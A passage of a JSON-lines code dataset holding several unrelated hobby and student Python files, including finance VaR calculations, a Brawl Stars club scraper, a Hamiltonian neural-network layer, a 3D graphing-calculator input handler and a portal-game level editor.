else:\n os.system('cls')\n\n","repo_name":"dcooper-holmes/PythonProjects","sub_path":"100-Days-Of-Code/Day-9-Secret-Auction/SecretAuction.py","file_name":"SecretAuction.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40003010510","text":"import math\n\ndef nCr(n,r):\n Nf=math.factorial(n)\n Rf=math.factorial(r)\n NminusRf=math.factorial(n-r)\n return Nf//(Rf*NminusRf)\n\n# n,r=map(int,input().split())\nn=input(\"n>>\")\nr=input(\"r>>\")\n\nprint(nCr(n,r))","repo_name":"shinkeonkim/KMU_Class","sub_path":"1-1/python/funtion_factorial.py","file_name":"funtion_factorial.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10315422689","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndef PLcalc(lastweek, thisweek):\r\n \tS= 'S' # prefix\r\n \tT = '.txt' # suffix\r\n \tBS = 'BS'\r\n\r\n \tdate = str(lastweek) # date\r\n \tFNlast = S+date+T # filename\r\n \tSlast = pd.read_table(FNlast, sep=' ', header=None)\r\n\r\n \tdate = str(thisweek) # date\r\n \tFNthis = S+date+T # filename\r\n \tSthis = pd.read_table(FNthis, sep=' ', header=None)\r\n\r\n \tdate = str(lastweek)\r\n \tFNBSlast = BS+date+T\r\n \tBSlast = pd.read_table(FNBSlast,sep=' ', header=None )\r\n \t#print(BSlast)\r\n\r\n \tPL = ((Sthis[1]-Slast[1])/Slast[1]*BSlast[1])+((Sthis[2]-Slast[2])/Slast[2]*BSlast[2])\r\n \t#print(PL)\r\n\r\n \tCthis = BSlast[0]\r\n \tAthis0 = Sthis[1]/Slast[1]*BSlast[1]\r\n \tAthis1 = Sthis[2]/Slast[2]*BSlast[2]\r\n \tBSthis = pd.concat([Cthis, Athis0, Athis1],axis=1)\r\n \t#print(BSthis)\r\n\r\n \tNetValue=Cthis+Athis0+Athis1\r\n \t#print(NetValue)\r\n\r\n \tdate = str(thisweek)\r\n \tBSthis.to_csv(BS+date+T, sep=' ', header=False, index=False)\r\n \treturn PL\r\n\r\ndef var_calc(thisweek,term):\r\n\tS = 'S' # prefix\r\n\tT = '.txt' # suffix\r\n\tBS = 'BS'\r\n\r\n\tnames = ['cash','tyo','ben']\r\n\tr = []\r\n\tfor name in names:\r\n\t\tFileName = name + '.csv'\r\n\t\tdf = pd.read_csv(FileName)\r\n\t\ta_df = df.values\r\n\t\titemcounter = 0\r\n\t\tfor item in a_df:\r\n\t\t\tif itemcounter ==0:\r\n\t\t\t\tr1 = []\r\n\t\t\t\titemcounter +=1\r\n\t\t\telse:\r\n\t\t\t\tvaluetoday = a_df[itemcounter][0]\r\n\t\t\t\tvalueyesterday = a_df[itemcounter-1][0]\r\n\t\t\t\treturntoday = (valuetoday-valueyesterday)/valueyesterday\r\n\t\t\t\tr1.append(returntoday)\r\n\t\t\t\titemcounter +=1\r\n\t\tr.append(r1)\r\n\r\n\tdf = pd.DataFrame(data = r, index = names)\r\n\t#print(df)\r\n\r\n\t#toyota = df.iloc[1,:]\r\n\t#sony = df.iloc[2,:]\r\n\r\n\tmu = df.mean(axis=1)\r\n\t#print(mu)\r\n\tdate = str(thisweek)\r\n\tFNBSthis = BS+date+T\r\n\tbs = pd.read_table(FNBSthis, sep=' ', names = names)\r\n\tbst = bs.T\r\n\r\n\tbsa = np.array(bs)\r\n\tbsta = np.array(bst)\r\n\t#print(bsa)\r\n\t#print(bsta)\r\n\r\n\tdot = np.dot(bsa, mu) #行列の内積\r\n\t#print(dot)\r\n\r\n\tcov = np.cov(df, rowvar = 1, bias = 1) #共分散行列\r\n\t#print(cov)\r\n\r\n\t#dot3 = np.dot(np.dot(bsa, cov), bsta)\r\n\t#print(dot3)\r\n\r\n\tdot3 = bsa@cov@bsta #行列の掛算3つ以上\r\n\t#print(dot3)\r\n\tT = term\r\n\tVaR = -dot*T + 2.33*np.sqrt(dot3*T)\r\n\t#print(VaR)\r\n\treturn VaR","repo_name":"kazutaka-lab/tech-base","sub_path":"my_function.py","file_name":"my_function.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15589942112","text":"from decouple import config\nfrom datetime import datetime\nimport os\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\n\nAPI_TOKEN = config('API_TOKEN')\nDATABASE_URL = config('DATABASE_URL')\nFIXIE_URL = config('FIXIE_URL')\nURI = DATABASE_URL[:8] + 'ql' + DATABASE_URL[8:]\n\ndate = datetime.utcnow()\n\nif date.weekday() == 2:\n\n club_tag = '#2YPY9LVV9'\n headers = {\n 'Authorization' : f'Bearer {API_TOKEN}',\n }\n proxies = {\n 'http' : os.environ.get('FIXIE_URL', ''),\n 'https' : os.environ.get('FIXIE_URL', ''),\n }\n response = requests.get(\n # the hashtag '#' is encoded as '%23' in the URL\n f'https://api.brawlstars.com/v1/clubs/%23{club_tag[1:]}/members',\n headers=headers,\n proxies=proxies,\n )\n club_members_list = response.json()['items']\n \n season = f'{date.year}-{date.isocalendar().week}'\n club_members_df = pd.DataFrame(\n {\n 'season' : [season] * len(club_members_list),\n 'player_tag' : [member['tag'] for member in club_members_list],\n 'player_name' : [member['name'] for member in club_members_list],\n 'trophies' : [member['trophies'] for member in club_members_list],\n },\n )\n \n engine = create_engine(URI, poolclass=NullPool)\n with engine.connect() as connection:\n club_members_df.to_sql(\n 'club_members',\n connection,\n if_exists='append',\n index=False\n )\n connection.execute(\n f''' INSERT INTO job_log (job_timestamp, job)\n VALUES('{date}', 'get_club_members.py'); '''\n )\n\n print('Script get_club_members.py executed successfully.')\n\nelse:\n print('Today is not Wednesday.')\n","repo_name":"pascalaigner/brawl-stars-club-league","sub_path":"scheduled_jobs/get_club_members.py","file_name":"get_club_members.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34943596347","text":"from multiprocessing import Pool\nimport os, time, random\n\n''''\n当需要创建的⼦进程数量不多时,可以直接利⽤multiprocessing中的Process\n动态成⽣多个进程,但如果是上百甚⾄上千个⽬标,⼿动的去创建进程的⼯\n作量巨⼤,此时就可以⽤到multiprocessing模块提供的Pool⽅法。\n初始化Pool时,可以指定⼀个最⼤进程数,当有新的请求提交到Pool中时,\n如果池还没有满,那么就会创建⼀个新的进程⽤来执⾏该请求;但如果池中\n的进程数已经达到指定的最⼤值,那么该请求就会等待,直到池中有进程结\n束,才会创建新的进程来执⾏\n'''\n\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执⾏,进程号为%d\" % (msg, os.getpid()))\n # random.random()随机⽣成0~1之间的浮点数\n time.sleep(random.random() * 2)\n t_stop = time.time()\n print(msg, \"执⾏完毕,耗时%0.2f\" % (t_stop - t_start))\n\n\npo = Pool(3) # 定义⼀个进程池,最⼤进程数3\nfor i in range(0, 10):\n # Pool.apply_async(要调⽤的⽬标,(传递给⽬标的参数元祖,))\n # 每次循环将会⽤空闲出来的⼦进程去调⽤⽬标 如果超过了指定的最大数量 也会添加进去的\n # apply_async 是非堵塞的 apply是堵塞的\n po.apply_async(worker, (i,))\n # po.apply(worker, (i,))\n print(\"----start----\")\npo.close() # 关闭进程池,关闭后po不再接收新的请求\npo.join() # 等待po中所有⼦进程执⾏完成,必须放在close语句之后 不join池中的进程不会执行\nprint(\"-----end-----\")\n","repo_name":"zoushiqing/python","sub_path":"第二章 python核心编程/第2节Linux系统编程/进程/进程池Pool.py","file_name":"进程池Pool.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35748016529","text":"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module\n\nimport torch.nn as nn\n# from torchdiffeq import odeint_adjoint as odeint\nfrom torchdiffeq import odeint as odeint\nimport geotorch\nimport os\n\n\n\ndef act1(x): \n act_main = torch.nn.ELU(inplace=False)\n return 0.5*(torch.pow(F.relu(x),2)+ act_main(x))\n\n######### option 2 ############\n#act = ln((exp(x)+1)/2) if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act2(xx): \n m = 1.1 ##m >=1\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + m*torch.log((torch.exp(F.relu(x))+1)/2+1e-8)\n\n######### option 3 ############\n#act = x^m+0.5x if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act3(xx): \n m = 3 ##m>=2\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + torch.pow(F.relu(x),m)+ 0.5*F.relu(x)\n\n\nclass my_act(nn.Module):\n def __init__(self, act):\n super(my_act, self).__init__()\n self.act = act\n \n def forward(self, x):\n return self.act(x)\n\n##################### pos_constraint for weight ################\n\n######### option 1 ############\n# def pos_constraint(x):\n# # act = torch.sigmoaid()\n# return torch.sigmoid(x)*0.001\n\n######### option 2 ############\ndef pos_constraint(x):\n# act = torch.sigmoaid()\n return torch.abs(x)\n\n\nclass ReHU(nn.Module):\n \"\"\" Rectified Huber unit\"\"\"\n def __init__(self, d):\n super().__init__()\n self.a = 1/d\n self.b = -d/2\n\n def forward(self, x):\n return torch.max(torch.clamp(torch.sign(x)*self.a/2*x**2,min=0,max=-self.b),x+self.b)\n \n \n \n\n \n \ndef batch_jacobian(func, x, create_graph=False):\n # x in shape (Batch, Length)\n def _func_sum(x):\n return func(x).sum(dim=0)\n\n return torch.autograd.functional.jacobian(_func_sum, x, create_graph=create_graph).permute(1,2,0)\n\nclass myLinear(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n \n ## input --> f0 (2*dim, 2*dim) --> f1 (2*dim, 8*dim) --> f2 (8*dim, 2*dim) --> f3 (2*dim, 1)\n #### from f1 to f3, we need the weight to be postive, that's why we call pos_constraint() below\n ##### all activation function need to be convex and non-decreasing #######\n \n \n self.dim = size_in\n \n # self.act = my_act(act1)\n # self.act = act2\n self.act = ReHU(d=0.1)\n\n \n max_ = +0.001\n min_ = -0.001\n # max_ = +0.0002\n # min_ = -0.0002\n \n w1_z = torch.Tensor(self.dim*8, self.dim*2)\n self.w1_z = nn.Parameter(w1_z)\n b1 = torch.Tensor(self.dim*8)\n self.b1 = nn.Parameter(b1)\n \n w2_z = torch.Tensor(self.dim*2, self.dim*8)\n self.w2_z = nn.Parameter(w2_z)\n b2 = torch.Tensor(self.dim*2)\n self.b2 = nn.Parameter(b2)\n \n w3_z = torch.Tensor(1, self.dim*2)\n self.w3_z = nn.Parameter(w3_z)\n b3 = torch.Tensor(1)\n self.b3 = nn.Parameter(b3)\n \n self.w0_y = nn.Linear(in_features=2*self.dim,out_features=2*self.dim) ####w0_y is free, and no constraints\n \n \n ####### initial the parameters ###########\n self.b1.data.uniform_(min_, max_)\n self.w1_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w1_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w1_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n\n # torch.nn.init.normal_(self.w1_z)\n # torch.nn.init.normal_(self.b1)\n\n # torch.nn.init.xavier_uniform_(self.w1_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b1, gain=1.0)\n # torch.nn.init.constant_(self.b1, val=0.001)\n\n ####### initial the parameters ###########\n self.b2.data.uniform_(min_, max_)\n self.w2_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w2_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w2_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w2_z)\n # torch.nn.init.normal_(self.b2)\n\n # torch.nn.init.xavier_uniform_(self.w2_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b2, gain=1.0)\n # torch.nn.init.constant_(self.b2, val=0.001)\n\n ####### initial the parameters ###########\n self.b3.data.uniform_(min_, max_)\n self.w3_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w3_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w3_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w3_z)\n # torch.nn.init.normal_(self.b3)\n\n # torch.nn.init.xavier_uniform_(self.w3_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b3, gain=1.0)\n # torch.nn.init.constant_(self.b3, val=0.001)\n\n\n\n \n def forward(self, x):\n z1 = self.act(self.w0_y(x))\n \n w1_z = pos_constraint(self.w1_z)\n z2 = F.linear(z1, w1_z, bias=self.b1)\n z2 = self.act(z2)\n \n \n w2_z = pos_constraint(self.w2_z)\n z3 = F.linear(z2, w2_z, bias=self.b2)\n z3 = self.act(z3)\n \n \n w3_z = pos_constraint(self.w3_z)\n z4 = F.linear(z3, w3_z, bias=self.b3)\n z4 = self.act(z4)\n \n \n f = z4\n \n return f\n \nclass Hamilton_V2(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n self.dim = size_in\n \n self.H = myLinear(self.dim)\n\n \n def forward(self,t, input_):\n ### input_ should be 2xdim as [x, v], where x is manifold position and v is the tangent vector\n ### If you only have v, set x as 0\n \n x = input_[...,0:self.dim]\n v = input_[...,self.dim:]\n \n \n H_derivatie = batch_jacobian(lambda xx: self.H(xx), input_, create_graph=True).squeeze()\n # print(H_derivatie.shape)\n \n dx = H_derivatie[...,0:self.dim]\n dv = -1*H_derivatie[...,self.dim:]\n\n \n out = torch.hstack([dx, dv])\n \n \n return out\n\nif __name__=='__main__':\n ######## select convex activation function ###########\n act = act1\n\n\n dim = 16\n con = Hamilton_V2(dim)\n a = torch.zeros(128,dim*2)\n b = con(a)","repo_name":"zknus/Hamiltonian-GNN","sub_path":"layers/H_2.py","file_name":"H_2.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"17327808549","text":"import webapp2\nimport urlparse\n\nimport tests\n\nimport types\nimport random\nimport os\nimport time\n\nclass MSDebugHandler( webapp2.RequestHandler ):\n\n def get( self, testname, path ):\n start_time = time.time()\n \n if len(path) == 0:\n path = \"/\"\n\n if path[0] != '/':\n path = \"/\" + path\n \n args = self.request.GET.dict_of_lists()\n \n for (k,v) in args.items():\n if type(v) == types.ListType and len(v) == 1:\n args[k] = v[0]\n \n # debug request\n test = getattr( tests, testname )\n status = None\n msg = None\n if test == None:\n status = 404\n msg = \"No such test '%s'\" % testname\n else:\n status, msg = test.test( path, args )\n\n self.response.status = status\n self.response.headers['X-Total-Time'] = str( int( (time.time() - start_time) * 1e9) )\n self.response.write( msg )\n return\n\n def put( self, _path ):\n pass","repo_name":"syndicate-storage/syndicate","sub_path":"ms/tests/debughandler.py","file_name":"debughandler.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"24854823973","text":"# handles modes besides graph3D, setting modes, and help\r\nfrom Graph3D import *\r\n\r\n# turns equation list to string\r\ndef formEquationString(equation):\r\n result = \"\"\r\n for entry in equation:\r\n result += str(entry)\r\n return result\r\n\r\ndef getCursorPosition(data):\r\n if len(data.inputs)==0:\r\n return [0,0]\r\n row = data.inputs[:data.cursorListPosition].count(\"\\n\")\r\n totalRows = data.inputs.count(\"\\n\")\r\n centerRow = totalRows/2\r\n textDY = (row-centerRow)*data.textLineHeight\r\n if data.cursorListPosition==0:\r\n textDX = 0\r\n elif data.inputs[data.cursorListPosition-1]==\"\\n\":\r\n textDX = 0\r\n else:\r\n lineStartIndex = data.cursorListPosition-1\r\n while True:\r\n if lineStartIndex==0:\r\n break\r\n elif data.inputs[lineStartIndex-1] != \"\\n\":\r\n lineStartIndex -= 1\r\n else:\r\n break\r\n lineDistance = 0\r\n for i in range(lineStartIndex, data.cursorListPosition):\r\n lineDistance += len(str(data.inputs[i]))\r\n textDX = lineDistance*data.textWidth\r\n data.cursorPosition = [textDX, textDY]\r\n\r\n################################################################################\r\n## KeyPressed\r\n################################################################################\r\n\r\ndef keyPressed3DOptions(event, data):\r\n if data.mode in [\"function3DList\", \"parametric3D2PList\", \"parametric3D1PList\"]:\r\n keyPressed3DList(event, data)\r\n elif data.mode in [\"function3DInput\", \"parametric3D2PInput\", \"parametric3D1PInput\"]:\r\n keyPressed3DInput(event, data)\r\n\r\ndef keyPressed3DList(event, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\":\r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n boxHeight = data.equationBoxSize[1]*boxFactor\r\n if event.keysym==\"Up\":\r\n if data.listScroll<0:\r\n data.listScroll += data.listScrollSpeed\r\n elif event.keysym==\"Down\":\r\n if data.equationBoxSize[1]+(len(graphList)+1)*boxHeight+data.listScroll>=data.height:\r\n data.listScroll -= data.listScrollSpeed\r\n\r\ndef keyPressed3DInput(event, data):\r\n if data.mode==\"function3DInput\":\r\n allowedKeysym = \"1234567890xyzep\"\r\n elif data.mode==\"parametric3D2PInput\":\r\n allowedKeysym = \"1234567890xyztuep\"\r\n elif data.mode==\"parametric3D1PInput\":\r\n allowedKeysym = \"1234567890xyztep\"\r\n \r\n if event.keysym in allowedKeysym or event.char in data.extraKeys or event.keysym==\"Return\":\r\n if event.keysym==\"p\":\r\n data.inputs.insert(data.cursorListPosition, \"π\")\r\n elif event.keysym==\"Return\":\r\n data.inputs.insert(data.cursorListPosition, \"\\n\")\r\n else:\r\n data.inputs.insert(data.cursorListPosition, event.char)\r\n data.cursorListPosition += 1\r\n elif event.keysym==\"BackSpace\":\r\n if data.cursorListPosition>0:\r\n data.inputs.pop(data.cursorListPosition-1)\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Left\":\r\n if data.cursorListPosition>0:\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Right\":\r\n if data.cursorListPosition=boxHeight/boxFactor:\r\n whichFunction = int((event.y-boxHeight/boxFactor-data.listScroll)/boxHeight)\r\n if whichFunction==len(graphList):\r\n data.modifyIndex = \"new\"\r\n data.mode = inputMode\r\n elif whichFunction=topLeft[0] and event.y>=topLeft[1]:\r\n col = int((event.x-topLeft[0])/buttonWidth)\r\n row = int((event.y-topLeft[1])/buttonHeight)\r\n if (row,col) == (0,0):\r\n if data.keyboardMode==\"trig\":\r\n data.keyboardMode = \"inv\"\r\n else:\r\n data.keyboardMode = \"trig\"\r\n elif keyMask[row][col]==1:\r\n data.inputs.insert(data.cursorListPosition, keys[row][col])\r\n data.cursorListPosition += 1\r\n getCursorPosition(data)\r\n\r\n################################################################################\r\n## DRAW\r\n################################################################################\r\n\r\ndef drawOptions3DMode(canvas, data):\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draws other boxes\r\n boxWidth, boxHeight = data.options3DBoxSize[0], data.options3DBoxSize[1]\r\n canvas.create_rectangle((data.width/2-boxWidth/2,boxHeight),\\\r\n (data.width/2+boxWidth/2,2*boxHeight), width=1)\r\n canvas.create_text((data.width/2,3*boxHeight/2),\\\r\n text=\"Functions\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,2*boxHeight),\\\r\n (data.width/2+boxWidth/2,3*boxHeight), width=1)\r\n canvas.create_text((data.width/2,5*boxHeight/2),\\\r\n text=\"Parametric (2 Parameters)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,3*boxHeight),\\\r\n (data.width/2+boxWidth/2,4*boxHeight), width=1)\r\n canvas.create_text((data.width/2,7*boxHeight/2),\\\r\n text=\"Parametric (1 Parameter)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n\r\n\r\ndef draw3DList(canvas, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\": \r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n # draws every 3D function\r\n boxWidth, boxHeight = data.equationBoxSize[0], data.equationBoxSize[1]*boxFactor\r\n margin = data.width/20\r\n for i in range(len(graphList)+1):\r\n canvas.create_rectangle((0,boxHeight*i+data.equationBoxSize[1]+data.listScroll),\\\r\n (boxWidth,boxHeight*(i+1)+data.equationBoxSize[1]+data.listScroll), width=1)\r\n # add function\r\n if i==len(graphList):\r\n canvas.create_text((data.width/2,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n text=\"+\", fill=\"lime green\", font=\"Arial \"+str(int(boxHeight/2/boxFactor)))\r\n # existing functions\r\n else:\r\n canvas.create_text((margin,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n anchor=\"w\", text=formEquationString(graphList[i].display),\\\r\n font=\"Courier \"+str(int(boxHeight/5/boxFactor)))\r\n canvas.create_rectangle((0,0), (data.width,data.equationBoxSize[1]), width=0, fill=\"white\")\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n\r\n\r\ndef draw3DInput(canvas, data):\r\n if data.mode==\"function3DInput\":\r\n keyMask = data.function3DKeyMask\r\n elif data.mode==\"parametric3D2PInput\":\r\n keyMask = data.parametric3D2PKeyMask\r\n elif data.mode==\"parametric3D1PInput\": \r\n keyMask = data.parametric3D1PKeyMask\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Go box\r\n canvas.create_rectangle((data.width-boxWidth,0), (data.width,boxHeight), width=1)\r\n canvas.create_text((data.width-boxWidth/2,boxHeight/2), text=\"Go\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Delete box\r\n if data.modifyIndex != \"new\":\r\n canvas.create_rectangle((data.width-2*boxWidth,0), (data.width-boxWidth,boxHeight), width=1)\r\n canvas.create_text((data.width-3*boxWidth/2,boxHeight/2), fill=\"red\", text=\"Delete\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n \r\n if data.keyboardMode==\"trig\":\r\n keys = data.calcKeyboardTrig\r\n else:\r\n keys = data.calcKeyboardInv\r\n numCols = len(keys[0])\r\n numRows = len(keys)\r\n buttonWidth = data.width/numCols\r\n buttonHeight = buttonWidth*2/3\r\n topLeft = [0, data.height-numRows*buttonHeight]\r\n for row in range(numRows):\r\n for col in range(numCols):\r\n if keyMask[row][col]==1:\r\n boxColor = \"white\"\r\n textColor = \"black\"\r\n else:\r\n boxColor = \"gray70\"\r\n textColor = \"gray30\"\r\n canvas.create_rectangle((topLeft[0]+col*buttonWidth,topLeft[1]+row*buttonHeight),\\\r\n (topLeft[0]+(col+1)*buttonWidth,topLeft[1]+(row+1)*buttonHeight), width=1, fill=boxColor)\r\n canvas.create_text((topLeft[0]+(col+0.5)*buttonWidth,topLeft[1]+(row+0.5)*buttonHeight),\\\r\n text=keys[row][col], fill=textColor, font=\"Courier \"+str(int(buttonHeight/3)))\r\n margin = data.width/20\r\n canvas.create_text((margin,data.height/3), anchor=\"w\", text=formEquationString(data.inputs),\\\r\n font=\"Courier \"+str(int(buttonHeight/2)))\r\n textHeight = data.textHeight\r\n textWidth = data.textWidth\r\n canvas.create_line((margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]-textHeight/2),\\\r\n (margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]+textHeight/2), width=1)\r\n","repo_name":"axu682/3D-Graphing-Calculator","sub_path":"InputModes.py","file_name":"InputModes.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33704547375","text":"from portal import colors\nfrom portal.geometry import Position\nfrom portal.wall import Wall, PortalWall, Ledge, Door, Grill\nfrom portal.entity import Portal, Cube, Button\n\nclass Tool:\n def __init__(self, canvas, level):\n self.canvas = canvas\n self.level = level\n self.setup()\n\n def setup(self):\n pass\n\n def mousedown(self, x, y):\n pass\n\n def mousemove(self, x, y):\n pass\n\n def mouseup(self, x, y):\n pass\n\nclass PlayerTool(Tool):\n name = 'Place player'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.start.move_to(p)\n self.level.player.move_to(p)\n self.canvas.redraw()\n\nclass GoalTool(Tool):\n name = 'Place goal'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.goal.move_to(p)\n self.canvas.redraw()\n\n\nclass SegmentTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x), round(y))\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n segment.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n self.level.walls.append(segment)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n return Position(x, self.pos1.y)\n else:\n return Position(self.pos1.x, y)\n\n def _make_segment(self, pos1, pos2):\n raise NotImplementedError\n\nclass WallTool(SegmentTool):\n name = 'Wall'\n def _make_segment(self, pos1, pos2):\n return Wall(pos1, pos2)\n\nclass PortalWallTool(SegmentTool):\n name = 'Portalable wall'\n def _make_segment(self, pos1, pos2):\n return PortalWall(pos1, pos2)\n\nclass LedgeTool(SegmentTool):\n name = 'Ledge'\n def _make_segment(self, pos1, pos2):\n return Ledge(pos1, pos2)\n\nclass DoorTool(SegmentTool):\n name = 'Door'\n def _make_segment(self, pos1, pos2):\n return Door(pos1, pos2, [])\n\nclass GrillTool(SegmentTool):\n name = 'Grill'\n def _make_segment(self, pos1, pos2):\n return Grill(pos1, pos2)\n\nclass PortalTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n portal.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(x, y)\n if self.pos1.pos() != pos2.pos():\n portal = self._make_portal(self.pos1, pos2)\n self.level.add_entity(portal)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n x = round(x * 2) * 0.5\n y = round(y * 2) * 0.5\n if x == self.pos1.x and y == self.pos1.y:\n return Position(x, y)\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n if x > self.pos1.x:\n return Position(self.pos1.x + 1, self.pos1.y)\n else:\n return Position(self.pos1.x - 1, self.pos1.y)\n else:\n if y > self.pos1.y:\n return Position(self.pos1.x, self.pos1.y + 1)\n else:\n return Position(self.pos1.x, self.pos1.y - 1)\n\n def _make_portal(self, pos1, pos2):\n raise NotImplementedError\n\nclass Portal1Tool(PortalTool):\n name = 'Orange portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal1')\n\nclass Portal2Tool(PortalTool):\n name = 'Blue portal'\n def _make_portal(self, pos1, pos2):\n return Portal(pos1, pos2, 'portal2')\n\nclass CubeTool(Tool):\n name = 'Cube'\n def mousedown(self, x, y):\n cube = Cube(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(cube)\n self.canvas.redraw()\n\nclass ButtonTool(Tool):\n name = 'Button'\n def mousedown(self, x, y):\n button = Button(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.add_entity(button)\n self.canvas.redraw()\n\nclass TriggerTool(Tool):\n name = 'Connect door to button'\n def setup(self):\n self.door = None\n self.button = None\n\n def mousedown(self, x, y):\n door = self._get_door(x, y)\n button = self._get_button(x, y)\n if door and button:\n if door.center().distance(Position(x, y)) < button.distance(Position(x, y)):\n self.door = door\n else:\n self.button = button\n elif door:\n self.door = door\n elif button:\n self.button = button\n\n def mousemove(self, x, y):\n if self.door:\n self.canvas.redraw()\n button = self._get_button(x, y)\n if button:\n self._draw_trigger(self.door.center(), button)\n else:\n self._draw_trigger(self.door.center(), Position(x, y))\n 